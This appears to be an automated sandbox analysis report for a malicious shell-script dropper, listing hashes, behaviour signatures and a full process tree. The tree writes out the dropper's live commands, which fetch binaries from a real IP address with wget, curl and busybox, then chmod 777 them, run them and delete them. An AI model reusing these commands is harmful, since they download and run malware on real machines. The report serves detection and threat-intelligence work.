Analysis
max time kernel: 19s
max time network: 20s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 25/10/2024, 01:33
Static task: static1
Behavioral task: behavioral1
  Sample: 506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
  Sample: 506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: 506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
  Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
  Sample: 506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
  Resource: debian9-mipsel-20240226-en
General
Target: 506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Size: 10KB
MD5: 766dedc13963c6b6ee0d4904bf619106
SHA1: 3b93a1c4a9df4d54c75ef3b445ca55244506866c
SHA256: 506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264
SHA512: 708c383986fa3596893356ad7ced7c503f4bdab762a319ff71291af63bf23e29ce72ae833bc4f47293c9031f7b78bc55a6a61f9d67585f39fb2412103eb6875b
SSDEEP: 192:jbYbCQCoCnCuCKCzIkq3VdEZ1KVdEZ1PCQCoCnCuCKCEt:/YbCQCoCnCuCKCzIkqWCQCoCnCuCKCQ
Malware Config
Signatures

File and Directory Permissions Modification (1 TTPs, 13 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid  Process
  683  chmod
  700  chmod
  748  chmod
  794  chmod
  826  chmod
  812  chmod
  820  chmod
  832  chmod
  739  chmod
  770  chmod
  788  chmod
  800  chmod
  806  chmod

Executes dropped EXE (13 IoCs)
  ioc                                       pid  Process
  /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW   684  UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW
  /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc   702  SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc
  /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt   740  LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt
  /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517   749  LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517
  /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT   771  2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT
  /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal   789  iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal
  /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62   795  TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62
  /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1   801  YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1
  /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV   807  jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV
  /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB   813  51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB
  /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF   821  6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF
  /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U   827  LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U
  /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES   833  sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES

Checks CPU configuration (1 TTPs, 13 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  description              ioc             Process
  File opened for reading  /proc/cpuinfo   curl   (13 occurrences, one per curl download)

Reads runtime system information
  description              ioc                            Process
  File opened for reading  /proc/sys/crypto/fips_enabled  curl   (13 occurrences)
  File opened for reading  /proc/self/auxv                curl   (13 occurrences)

Writes file to tmp directory (13 IoCs)
  Malware often drops required files in the /tmp directory.
  description                   ioc                                       Process
  File opened for modification  /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES   curl
  File opened for modification  /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW   curl
  File opened for modification  /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc   curl
  File opened for modification  /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt   curl
  File opened for modification  /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV   curl
  File opened for modification  /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF   curl
  File opened for modification  /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U   curl
  File opened for modification  /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517   curl
  File opened for modification  /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT   curl
  File opened for modification  /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal   curl
  File opened for modification  /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62   curl
  File opened for modification  /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1   curl
  File opened for modification  /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB   curl
Processes
Each entry is: image | command line | PID. Child processes of the sample are indented one level; triggered signatures are listed beneath the process.

/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh | /tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh | PID:649
  /bin/rm | /bin/rm bins.sh | PID:653

  /usr/bin/wget | wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW | PID:660
  /usr/bin/curl | curl -O http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW | PID:673
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW | PID:680
  /bin/chmod | chmod 777 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW | PID:683
    signatures: File and Directory Permissions Modification
  /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW | ./UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW | PID:684
    signatures: Executes dropped EXE
  /bin/rm | rm UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW | PID:685

  /usr/bin/wget | wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc | PID:686
  /usr/bin/curl | curl -O http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc | PID:687
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc | PID:688
  /bin/chmod | chmod 777 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc | PID:700
    signatures: File and Directory Permissions Modification
  /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc | ./SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc | PID:702
    signatures: Executes dropped EXE
  /bin/rm | rm SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc | PID:704

  /usr/bin/wget | wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt | PID:705
  /usr/bin/curl | curl -O http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt | PID:712
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt | PID:719
  /bin/chmod | chmod 777 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt | PID:739
    signatures: File and Directory Permissions Modification
  /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt | ./LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt | PID:740
    signatures: Executes dropped EXE
  /bin/rm | rm LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt | PID:741

  /usr/bin/wget | wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 | PID:742
  /usr/bin/curl | curl -O http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 | PID:744
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 | PID:745
  /bin/chmod | chmod 777 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 | PID:748
    signatures: File and Directory Permissions Modification
  /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 | ./LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 | PID:749
    signatures: Executes dropped EXE
  /bin/rm | rm LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 | PID:750

  /usr/bin/wget | wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT | PID:752
  /usr/bin/curl | curl -O http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT | PID:757
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT | PID:763
  /bin/chmod | chmod 777 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT | PID:770
    signatures: File and Directory Permissions Modification
  /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT | ./2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT | PID:771
    signatures: Executes dropped EXE
  /bin/rm | rm 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT | PID:773

  /usr/bin/wget | wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal | PID:774
  /usr/bin/curl | curl -O http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal | PID:781
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal | PID:787
  /bin/chmod | chmod 777 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal | PID:788
    signatures: File and Directory Permissions Modification
  /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal | ./iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal | PID:789
    signatures: Executes dropped EXE
  /bin/rm | rm iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal | PID:790

  /usr/bin/wget | wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 | PID:791
  /usr/bin/curl | curl -O http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 | PID:792
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 | PID:793
  /bin/chmod | chmod 777 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 | PID:794
    signatures: File and Directory Permissions Modification
  /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 | ./TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 | PID:795
    signatures: Executes dropped EXE
  /bin/rm | rm TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 | PID:796

  /usr/bin/wget | wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 | PID:797
  /usr/bin/curl | curl -O http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 | PID:798
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 | PID:799
  /bin/chmod | chmod 777 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 | PID:800
    signatures: File and Directory Permissions Modification
  /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 | ./YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 | PID:801
    signatures: Executes dropped EXE
  /bin/rm | rm YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 | PID:802

  /usr/bin/wget | wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV | PID:803
  /usr/bin/curl | curl -O http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV | PID:804
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV | PID:805
  /bin/chmod | chmod 777 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV | PID:806
    signatures: File and Directory Permissions Modification
  /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV | ./jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV | PID:807
    signatures: Executes dropped EXE
  /bin/rm | rm jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV | PID:808

  /usr/bin/wget | wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB | PID:809
  /usr/bin/curl | curl -O http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB | PID:810
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB | PID:811
  /bin/chmod | chmod 777 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB | PID:812
    signatures: File and Directory Permissions Modification
  /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB | ./51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB | PID:813
    signatures: Executes dropped EXE
  /bin/rm | rm 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB | PID:815

  /usr/bin/wget | wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF | PID:816
  /usr/bin/curl | curl -O http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF | PID:818
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF | PID:819
  /bin/chmod | chmod 777 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF | PID:820
    signatures: File and Directory Permissions Modification
  /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF | ./6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF | PID:821
    signatures: Executes dropped EXE
  /bin/rm | rm 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF | PID:822

  /usr/bin/wget | wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U | PID:823
  /usr/bin/curl | curl -O http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U | PID:824
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U | PID:825
  /bin/chmod | chmod 777 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U | PID:826
    signatures: File and Directory Permissions Modification
  /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U | ./LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U | PID:827
    signatures: Executes dropped EXE
  /bin/rm | rm LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U | PID:828

  /usr/bin/wget | wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES | PID:829
  /usr/bin/curl | curl -O http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES | PID:830
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES | PID:831
  /bin/chmod | chmod 777 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES | PID:832
    signatures: File and Directory Permissions Modification
  /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES | ./sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES | PID:833
    signatures: Executes dropped EXE
  /bin/rm | rm sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES | PID:834

  /usr/bin/wget | wget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB | PID:835
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97